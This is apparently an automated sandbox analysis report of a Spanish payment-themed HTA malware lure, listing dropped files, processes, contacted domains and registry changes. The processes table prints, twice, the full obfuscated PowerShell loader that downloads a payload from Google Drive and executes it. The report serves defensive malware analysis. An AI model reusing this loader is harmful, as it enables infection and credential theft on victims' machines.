Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta
|
HTML document, ASCII text, with very long lines (364), with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x8462f1e3, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jpymj1w.0sy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzjwkmwf.lle.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uli50ha0.qs2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yymccahe.shb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Lactoscope.cla
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function
Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes,
$Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no
SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali
Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf
TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI
scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers
';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea
oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso
Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm
Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH
opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning
(Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz
SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife
Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf
Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph
etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb
P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL
vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b
FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T
ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g
sortrHermauWe,rynProcrdStrmklsplenaToretg,palieLlenmnSad seReymo=Geno.$Ba.baChardshInteroHematrSubthi Uno oNeu rr I,paeBokeftFestoiEthyln
Joura Gre lSamt,.PicarsIndpapJungplBen eiTernetHjt a(Tando$TransRUnparoDisposPhysoeInterlscl riPectolShims)Absal ');$Chorioretinal=$Administrationsgrundlagene[0];Vinddrejning
(Nejsigerens 'Kapit$Turn g bl.mlPre.eoUn ebbP,inkastatel Unsy:FirehSGlds,aDe,aunVriddeLanchrExtraiBonkanknevlgNatursBill pKompelBundlaMesennVommeeLand.rcaptanCi
rieoverg=Dr coNLighteKlammw boid- FeriOSammeb Respj Evine Pu,sc euphtDans B vbnS PresyRi.orsFort.t,tlasenephem.imch.DigalNCattleUopfotOply..Ego
iWH lsteCertibrbestCL vgilFraskiMisaweCtenonRecipt pseu ');Vinddrejning (Nejsigerens 'Non e$SkindSParacaSer nnGudsdeMagisrSubpoiAreoln
vendgCongos Inclp Exhal,ehelaS,irinArisaeStilfrBubblnOpsvueGenne.ForfiHsequee,odsiaFo.jad M,dve M,farBil is.arou[Unhon$V preAEquincLavricUdhunoAcma
uAfklipInd.bl tufe TracmCalcue Re tnUdviktDoven]Outcu=Hydr,$SalsoSHa dee illwdgr.deiOveremStok,eTherinHocust ordpe.uthytU
val ');$Udgangsstrm250=Nejsigerens 'MaryaSOverfa OptonTulipeHe.herEnergi cattn ConfgReaccsLeatmpSkammlkrvelaetelcnCoveneRocksrE,hnonShoole,reva.BindhDSt.teoO
svbwFartsnfjernlNe,orounfaba,otundPan cF,romaiHurrolKrit eBlank(Buest$CulpaCApochh,agsdoFarverEnhydiMa,tioUngagrShabreredeltStimaiHassen
bukka M.dnlAma t,.phol$Spli C AfskoBe,ttc StrekPaaref,alloisulphg TnkehUndert.estriStartnHeathg Rodo) ,ndh ';$Udgangsstrm250=$Cadeauer[1]+$Udgangsstrm250;$Cockfighting=$Cadeauer[0];Vinddrejning
(Nejsigerens 'Sondr$SpraigUpgirlFod,ro MiddbMonocaU ganl,idst:PressTRomani FremlSikkefM.stmr afbaeopsnad OdonsUnderhb ssie
lycedF,ikieFre.vrDdskrnVentreTaaresStudi=Stikb( emhuTNabobeBlaals Mid tDep,r- HypePRejeraMeedltSubpahKuvse ,nstr$SpidsCS,mmeoGeyercBuzzikNetvrf
ChariTilf.g Byrah OdestLikvii VerbnBackwgRnneb)Dilan ');while (!$Tilfredshedernes) {Vinddrejning (Nejsigerens 'Deepf$UndergUnscal
Bseso,yperb VigeaSof wlLav n:EsbjeUReflenForn.dAestueDodecr.pokefSirtsuUnm,tlGennedOrthotApusp= Tare$Preapt ReecrSwelpu Boa.eFragr
') ;Vinddrejning $Udgangsstrm250;Vinddrejning (Nejsigerens 'YauldSMaxyut,taova ShahrHippotSk ep-,nsigSnatiolAsthmeStjfrePirnapFante
Tredj4Pir.e ');Vinddrejning (Nejsigerens 'Misco$ForedgrdliglP,rcho C,nvbBysv,aSeleklEf.er:Sag,eTPle.iiCo,stlYapnefTe nirSkak,eHangadPsorisFalsihCentreWinkld
Perce Skobr HowenBegroeornitsK,der=Holde(Bat.rT Pi oeFo.rissejertLa.rs-I.surPDi,feaHarqutPyre.hDacke Priva$Un,veC Trb.oVerdecCorevkD,lemf
LageiBe,mtg SaddhSlyngtHydroiHaandn Litug Tyf,)Un us ') ;Vinddrejning (Nejsigerens 'Deant$IonizgLemlslMahogo KommbHex.ca Preal
Myre:Forb.AA pecg b.artSupereRecoprKh ziiRosennA aled Co,k= Prfe$MisvigTocyllEmpi oPompsbBrofoa Ma.ilBounc:EpalebPoes eExo
irWrenciSk ttgCanoneKonebrRetou+Kokon+Nonil%Besky$,ksisA Fretdraad,mSamariPreamnVilloi,ndsts.ryset Aetor VildaAmycltF.ndeiAtomloFrdignatamas
P rsg PladrEuropuKorrenHulladAfstelPhospa .ymbgS,ende aspanexpere Hydr.ReinccNeocooBesmou P.trnExcomtFldef ') ;$Chorioretinal=$Administrationsgrundlagene[$Agterind];}Vinddrejning
(Nejsigerens ' K,ag$at.mag Sjofl PersoE pirbVidnea Pulil Meta:PenteRpaletoandeliTvetus Br.ut StareA.roer,raadsAsthm Intra=
.nir Cr,ptGPap.le Nondt Prom-.nterCConfro RutenU,trytFjante UnmonDivert A.en Lrerr$ Cen,CDr,kno,knhec,enezkUnd rfRentaiRegnegs.ralhUdlantSpad,iRhinsnTopvigEbo,s
');Vinddrejning (Nejsigerens 'Pois $.entigUndaml H,ppo Cr,sbduaneasystelTermi:raa aURaketnInge.hBairna .piprKldedmFagalfTaageuSeniolOstrilExhibysvali
Velsi=Under Xanth[to.deSCytoly KrabsForcet Eksie UnidmPlatf.lykkeCS kuloFinann Nonfv preaeBloter AnimtMarti] ,ntg:Acant:Arb,jFSo.iorG,baroNe,stm
FortBSandwaIndets GifteBorte6 Stvb4BarnaS R,ngtRander R,tii .undnAffalg oug(Tonef$Sk wsRInexpoGrundi Pu.dsBarbatHjemmeAg,larLektis
.edt)Gardi ');Vinddrejning (Nejsigerens 'Apish$DermogRemedlGreeko,isjobMismoa.ynodlBiolo:Harpek BollojodtifOphidfPippieCalumrSkam,d
CrimaAquarmAg,oss Tilf ,ity=Releg Cresc[B.arbS Aftey InspsBrandtPatruePleurmBeski.BjergTRyddeeoriolx.ortftStr,e.UperiE KrybnEarricsartioDd.stdOutsliGalganelektgKera.]Pelti:semiv:udtryA
DuodS .ettCUsa,aITipvoIFordy.UnhouGHunkneTo.tftM.tchSAbsintNon irVermii,arginChansg.jenl(Ball,$SexolU,orhanTubulhSyle aTenotrFortomMur,rfUn
aru StralSelv,lDistry Muil)Husst ');Vinddrejning (Nejsigerens 'Latyr$B dcygArri lPolyboZooglbS raaa.ljfnlIrr s:UngnaCHjertiBurkisHenvicLed
loCharteSma.tsTh.ot=Serve$ SplakFris.oRandifRakkefDr nceSvendrKlassdreforaRibbimMoists,enyt.ForresKomb u uninbMinhasChayotKolonrDat
liBarbenIntimgdet,s(Pleur2ep.pg9Simul8Nonco9 Ufre6 Hype4Prod,,i ter2 tepd9Firdo3Bemal6Seric6Tekst) Koto ');Vinddrejning $Ciscoes;"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function
Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes,
$Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no
SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali
Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf
TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI
scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers
';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea
oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso
Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm
Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH
opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning
(Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz
SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife
Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf
Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph
etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb
P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL
vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b
FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T
ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g
sortrHermauWe,rynProcrdStrmklsplenaToretg,palieLlenmnSad seReymo=Geno.$Ba.baChardshInteroHematrSubthi Uno oNeu rr I,paeBokeftFestoiEthyln
Joura Gre lSamt,.PicarsIndpapJungplBen eiTernetHjt a(Tando$TransRUnparoDisposPhysoeInterlscl riPectolShims)Absal ');$Chorioretinal=$Administrationsgrundlagene[0];Vinddrejning
(Nejsigerens 'Kapit$Turn g bl.mlPre.eoUn ebbP,inkastatel Unsy:FirehSGlds,aDe,aunVriddeLanchrExtraiBonkanknevlgNatursBill pKompelBundlaMesennVommeeLand.rcaptanCi
rieoverg=Dr coNLighteKlammw boid- FeriOSammeb Respj Evine Pu,sc euphtDans B vbnS PresyRi.orsFort.t,tlasenephem.imch.DigalNCattleUopfotOply..Ego
iWH lsteCertibrbestCL vgilFraskiMisaweCtenonRecipt pseu ');Vinddrejning (Nejsigerens 'Non e$SkindSParacaSer nnGudsdeMagisrSubpoiAreoln
vendgCongos Inclp Exhal,ehelaS,irinArisaeStilfrBubblnOpsvueGenne.ForfiHsequee,odsiaFo.jad M,dve M,farBil is.arou[Unhon$V preAEquincLavricUdhunoAcma
uAfklipInd.bl tufe TracmCalcue Re tnUdviktDoven]Outcu=Hydr,$SalsoSHa dee illwdgr.deiOveremStok,eTherinHocust ordpe.uthytU
val ');$Udgangsstrm250=Nejsigerens 'MaryaSOverfa OptonTulipeHe.herEnergi cattn ConfgReaccsLeatmpSkammlkrvelaetelcnCoveneRocksrE,hnonShoole,reva.BindhDSt.teoO
svbwFartsnfjernlNe,orounfaba,otundPan cF,romaiHurrolKrit eBlank(Buest$CulpaCApochh,agsdoFarverEnhydiMa,tioUngagrShabreredeltStimaiHassen
bukka M.dnlAma t,.phol$Spli C AfskoBe,ttc StrekPaaref,alloisulphg TnkehUndert.estriStartnHeathg Rodo) ,ndh ';$Udgangsstrm250=$Cadeauer[1]+$Udgangsstrm250;$Cockfighting=$Cadeauer[0];Vinddrejning
(Nejsigerens 'Sondr$SpraigUpgirlFod,ro MiddbMonocaU ganl,idst:PressTRomani FremlSikkefM.stmr afbaeopsnad OdonsUnderhb ssie
lycedF,ikieFre.vrDdskrnVentreTaaresStudi=Stikb( emhuTNabobeBlaals Mid tDep,r- HypePRejeraMeedltSubpahKuvse ,nstr$SpidsCS,mmeoGeyercBuzzikNetvrf
ChariTilf.g Byrah OdestLikvii VerbnBackwgRnneb)Dilan ');while (!$Tilfredshedernes) {Vinddrejning (Nejsigerens 'Deepf$UndergUnscal
Bseso,yperb VigeaSof wlLav n:EsbjeUReflenForn.dAestueDodecr.pokefSirtsuUnm,tlGennedOrthotApusp= Tare$Preapt ReecrSwelpu Boa.eFragr
') ;Vinddrejning $Udgangsstrm250;Vinddrejning (Nejsigerens 'YauldSMaxyut,taova ShahrHippotSk ep-,nsigSnatiolAsthmeStjfrePirnapFante
Tredj4Pir.e ');Vinddrejning (Nejsigerens 'Misco$ForedgrdliglP,rcho C,nvbBysv,aSeleklEf.er:Sag,eTPle.iiCo,stlYapnefTe nirSkak,eHangadPsorisFalsihCentreWinkld
Perce Skobr HowenBegroeornitsK,der=Holde(Bat.rT Pi oeFo.rissejertLa.rs-I.surPDi,feaHarqutPyre.hDacke Priva$Un,veC Trb.oVerdecCorevkD,lemf
LageiBe,mtg SaddhSlyngtHydroiHaandn Litug Tyf,)Un us ') ;Vinddrejning (Nejsigerens 'Deant$IonizgLemlslMahogo KommbHex.ca Preal
Myre:Forb.AA pecg b.artSupereRecoprKh ziiRosennA aled Co,k= Prfe$MisvigTocyllEmpi oPompsbBrofoa Ma.ilBounc:EpalebPoes eExo
irWrenciSk ttgCanoneKonebrRetou+Kokon+Nonil%Besky$,ksisA Fretdraad,mSamariPreamnVilloi,ndsts.ryset Aetor VildaAmycltF.ndeiAtomloFrdignatamas
P rsg PladrEuropuKorrenHulladAfstelPhospa .ymbgS,ende aspanexpere Hydr.ReinccNeocooBesmou P.trnExcomtFldef ') ;$Chorioretinal=$Administrationsgrundlagene[$Agterind];}Vinddrejning
(Nejsigerens ' K,ag$at.mag Sjofl PersoE pirbVidnea Pulil Meta:PenteRpaletoandeliTvetus Br.ut StareA.roer,raadsAsthm Intra=
.nir Cr,ptGPap.le Nondt Prom-.nterCConfro RutenU,trytFjante UnmonDivert A.en Lrerr$ Cen,CDr,kno,knhec,enezkUnd rfRentaiRegnegs.ralhUdlantSpad,iRhinsnTopvigEbo,s
');Vinddrejning (Nejsigerens 'Pois $.entigUndaml H,ppo Cr,sbduaneasystelTermi:raa aURaketnInge.hBairna .piprKldedmFagalfTaageuSeniolOstrilExhibysvali
Velsi=Under Xanth[to.deSCytoly KrabsForcet Eksie UnidmPlatf.lykkeCS kuloFinann Nonfv preaeBloter AnimtMarti] ,ntg:Acant:Arb,jFSo.iorG,baroNe,stm
FortBSandwaIndets GifteBorte6 Stvb4BarnaS R,ngtRander R,tii .undnAffalg oug(Tonef$Sk wsRInexpoGrundi Pu.dsBarbatHjemmeAg,larLektis
.edt)Gardi ');Vinddrejning (Nejsigerens 'Apish$DermogRemedlGreeko,isjobMismoa.ynodlBiolo:Harpek BollojodtifOphidfPippieCalumrSkam,d
CrimaAquarmAg,oss Tilf ,ity=Releg Cresc[B.arbS Aftey InspsBrandtPatruePleurmBeski.BjergTRyddeeoriolx.ortftStr,e.UperiE KrybnEarricsartioDd.stdOutsliGalganelektgKera.]Pelti:semiv:udtryA
DuodS .ettCUsa,aITipvoIFordy.UnhouGHunkneTo.tftM.tchSAbsintNon irVermii,arginChansg.jenl(Ball,$SexolU,orhanTubulhSyle aTenotrFortomMur,rfUn
aru StralSelv,lDistry Muil)Husst ');Vinddrejning (Nejsigerens 'Latyr$B dcygArri lPolyboZooglbS raaa.ljfnlIrr s:UngnaCHjertiBurkisHenvicLed
loCharteSma.tsTh.ot=Serve$ SplakFris.oRandifRakkefDr nceSvendrKlassdreforaRibbimMoists,enyt.ForresKomb u uninbMinhasChayotKolonrDat
liBarbenIntimgdet,s(Pleur2ep.pg9Simul8Nonco9 Ufre6 Hype4Prod,,i ter2 tepd9Firdo3Bemal6Seric6Tekst) Koto ');Vinddrejning $Ciscoes;"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
|
||
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $"
|
||
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://r3.i.lencr.org/0R
|
unknown
|
||
http://mail.cash4cars.nz
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://www.microsoft.co
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://drive.usercontent.google.com/
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
https://drive.google.com//ApU3
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://drive.google.com/
|
unknown
|
||
http://x1.c.lencr.org/0
|
unknown
|
||
http://x1.i.lencr.org/0
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://ip-api.com
|
unknown
|
||
http://r3.o.lencr.org0
|
unknown
|
||
https://drive.google.com
|
unknown
|
||
https://drive.usercontent.google.com
|
unknown
|
||
https://drive.usercontent.google.com/y
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 20 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
mail.cash4cars.nz
|
114.142.162.17
|
||
drive.google.com
|
142.250.65.174
|
||
drive.usercontent.google.com
|
142.251.35.161
|
||
ip-api.com
|
208.95.112.1
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
114.142.162.17
|
mail.cash4cars.nz
|
Australia
|
||
142.251.35.161
|
drive.usercontent.google.com
|
United States
|
||
208.95.112.1
|
ip-api.com
|
United States
|
||
142.250.65.174
|
drive.google.com
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
